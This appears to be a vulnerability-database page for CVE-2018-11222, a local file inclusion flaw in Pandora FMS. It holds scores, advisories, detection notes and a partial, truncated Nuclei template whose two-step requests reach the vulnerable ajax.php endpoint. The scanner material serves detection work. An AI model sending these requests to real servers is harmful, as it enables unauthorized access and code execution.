CVE-2018-11222
published 2018-06-16CVE-2018-11222: Local File Inclusion (LFI) in Artica Pandora FMS through version 7.23 allows an attacker to call any php file via the /pandora_console/ajax.php ajax endpoint.
PriorityP275high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
5.62%
92.0th percentile
Local File Inclusion (LFI) in Artica Pandora FMS through version 7.23 allows an attacker to call any php file via the /pandora_console/ajax.php ajax endpoint.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| artica | pandora_fms | <= 7.23 | — |
Detection & IOCsextracted from sources · hover to see the quote
- ·The LFI is exploitable through the 'page' parameter of the ajax.php endpoint; any PHP file on the server can be called, not just phpinfo — detection rules should account for arbitrary file references, not just known payloads. ↗
- ·The exploit chain involves a two-step process: first extracting a path via a multipart POST, then using that path in a GET request — single-request detection may miss the full attack chain.
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2jph-rj29-p72m: Local File Inclusion (LFI) in Artica Pandora FMS through version 7
ghsa_unreviewed·2022-05-14
CVE-2018-11222 [HIGH] CWE-20 GHSA-2jph-rj29-p72m: Local File Inclusion (LFI) in Artica Pandora FMS through version 7
Local File Inclusion (LFI) in Artica Pandora FMS through version 7.23 allows an attacker to call any php file via the /pandora_console/ajax.php ajax endpoint.
VulnCheck
artica pandora_fms Improper Input Validation
vulncheck·2018·CVSS 7.5
CVE-2018-11222 [HIGH] artica pandora_fms Improper Input Validation
artica pandora_fms Improper Input Validation
Local File Inclusion (LFI) in Artica Pandora FMS through version 7.23 allows an attacker to call any php file via the /pandora_console/ajax.php ajax endpoint.
Affected: artica pandora_fms
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-26&host_type=src&vulnerability=cve-2018-11222; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-15&host_type=src&vulnerability=cve-2018-11222; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-18&host_type=src&vulnerability
No detection rules found.
Nuclei
Pandora FMS <=7.0NG.722 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2018-11222 [CRITICAL] Pandora FMS <=7.0NG.722 - Remote Code Execution
Pandora FMS ')}}
--------------------------Sh5BXowDBYvdaiPqkMSZas--
matchers:
- type: word
part: body
words:
- '"status":"success"'
- '"package":"'
condition: and
extractors:
- type: regex
name: path
part: body
group: 1
regex:
- '"package":"(.*?)"'
internal: true
- raw:
- |
GET /pandora_console/ajax.php?page={{replace(path,"\\","")}}/plugin/phpinfo HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '{{marker}}'
# digest: 4b0a00483046022100f100868d28b50ad562b86c5c0c4a11983f1f70340f322c1c726628e56e723e36022100a285ffdb63a34ec32535ef05645036f58b781544980b6c0699a76d690233feb3:922c64590222798bb761d5b6d8e72950
2018-06-16
Published
Exploited in the wild